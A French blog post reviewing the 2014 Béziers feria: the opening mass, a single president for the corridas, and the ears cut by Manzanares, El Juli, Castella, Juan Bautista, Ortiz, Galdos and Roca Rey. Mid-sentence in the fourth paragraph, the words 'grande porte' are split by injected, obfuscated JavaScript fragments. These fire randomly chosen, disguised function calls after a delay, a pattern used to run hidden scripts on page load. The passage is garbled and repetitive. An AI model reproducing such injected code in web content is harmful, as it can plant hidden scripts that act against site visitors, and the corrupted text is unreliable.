BEZIERS FERIA 2014

L’edition 2014 de la féria de Beziers comptait quelques petits changements : en ouverture de la feria une messe dans les arènes a eu lieu regroupant quelques 5000 fidèles.

Pour renouer avec la tradition lyrique des arènes de Béziers un baryton entonna le paséo de carmen chaque début de course. Un fait nouveau aussi ce fut la présidence des corridas qui furent donner cette année à une seule personne en l’occurrence Michel Daudé chirurgien et aficionado émérite qui a eu la lourde tache de présider les 4 corridas et la novillada. Choix déterminé par la nouvelle commission taurine extra municipale de la ville .

Le triomphateur absolu de la feria est le torero d’Alicante Jose Maria Manzanares qui distilla de très beaux détails devant le seul toro de la corrida de Daniel Ruiz qui permettait le triomphe. El Juli coupa une oreille après une véritable pélea avec un toro qui se défendait. Sébastien Castella fut pour sa part ovacionné après sa prestation.

Les autres toreros a couper des oreilles furent Juan bautista qui coupa une oreille sur des Margé et sur les Miuras le dernier jour . De plus, Sébastien Castella sur la corrida de Robert Margé coupa une oreille de chacun de ses adversaires et sortit lui aussi par la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande porte. Le samedi sur la corrida de Torrestrella le biterrois Cayetano Ortiz - qui effectué sa présentation dans ses arenes en tant que matador de toros - coupa lui aussi un pavillon sur chacun de ses opposants après un combat avec un toro fort armé qui lui infligea une forte voltereta. Le bilan des novilladas fait ressortir le triomphe de deux toreros sud américains. C'est d'abord le torero Péruvien Joaquin Galdos exilé a Malaga qui coupa deux oreilles très fetees et dans la bonne novillada de Pages Mailhan le colombien Andres Roca Rey coupa deux oreilles.

J. M. Manzanares - foto Bruno Lasnier

 

 

MANZA

Les commentaires sont fermés.